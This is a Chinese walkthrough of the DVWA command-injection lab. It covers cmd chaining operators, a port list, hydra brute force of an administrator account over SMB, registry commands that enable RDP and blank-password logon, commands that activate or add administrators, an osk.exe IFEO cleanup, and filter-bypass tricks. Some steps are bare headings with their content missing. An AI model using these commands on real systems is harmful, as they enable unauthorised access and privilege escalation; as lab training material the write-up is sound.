Low:
cmd连接符讲解:
1&2:运行1,然后运行2
1&&2:1运行成功后才运行2
1||2:1运行失败后运行2
1|2:管道符,将前者结果作为参数传给后者
开始测试:
拿到IP:
查系统信息:
查看开放端口:
一些重要的端口:
20 ftp-data FTP 数据端口
21 ftp 文件传输协议(FTP)端口;有时被文件服务协议(FSP)使用
22 ssh 安全 Shell(SSH)服务
23 telnet Telnet 服务
53 domain 域名服务(如 BIND) NOTE:其实就是DNS域名解析服务
69 tftp 小文件传输协议(TFTP)
80 http 用于万维网(WWW)服务的超文本传输协议(HTTP)
115 sftp 安全文件传输协议(SFTP)服务
123 ntp 网络时间协议(NTP)
135 RPC(远程过程调用)服务
137 netbios-ns 在红帽企业 Linux 中被 Samba 使用的 NETBIOS 名称服务
138 netbios-dgm 在红帽企业 Linux 中被 Samba 使用的 NETBIOS 数据报服务
139 netbios-ssn 在红帽企业 Linux 中被 Samba 使用的NET BIOS 会话服务
443 https 安全超文本传输协议(HTTP) 加密的超文本协议https
445 microsoft-ds 通过 TCP/IP 的服务器消息块(SMB)
546 dhcpv6-client 动态主机配置协议(DHCP)版本6客户
547 dhcpv6-server 动态主机配置协议(DHCP)版本6服务
1080 socks SOCKS 网络应用程序代理服务
1433 ms-sql-s Microsoft SQL 服务器
1521 oracle服务
2049 nfs [nfsd] 网络文件系统(NFS)
3306 mysql MySQL 数据库服务
3389 远程桌面连接rdp服务
8080 webcache 万维网(WWW)缓存服务
查看账号:
由此可开启hydra进行445端口爆破:login:administrator password:123
爆出账号密码:开启其3389:
原理:通过cmd命令更改注册表的值来决定允许或禁止,1为允许,0为禁止。windows默认不开其3389。3389注册表0为允许
开启3389:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭3389:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
禁用只允许控制台登录:
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa /v LimitBlankPasswordUse /t REG_DWORD /d 00000000 /f
测试:
cmd:mstsc:
administrator:123
拿下:
一些好用的命令:
开启超级管理员 net user administrator /active:yes
将标准用户提升为管理员 net localgroup administrators username /add
执行命令后删除添加的注册表:
reg delete "hklm\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /f
言归正传,Medium:
绕过方法:1||2(只要让1执行失败即可执行我们想要的2),1&2,根据拉黑规则;变为空,则构造&;&最后执行则为&&
测试:
High:
这题有点沙雕,直接对|+空格过滤而不是|过滤。那么|就能绕过。
Impossible: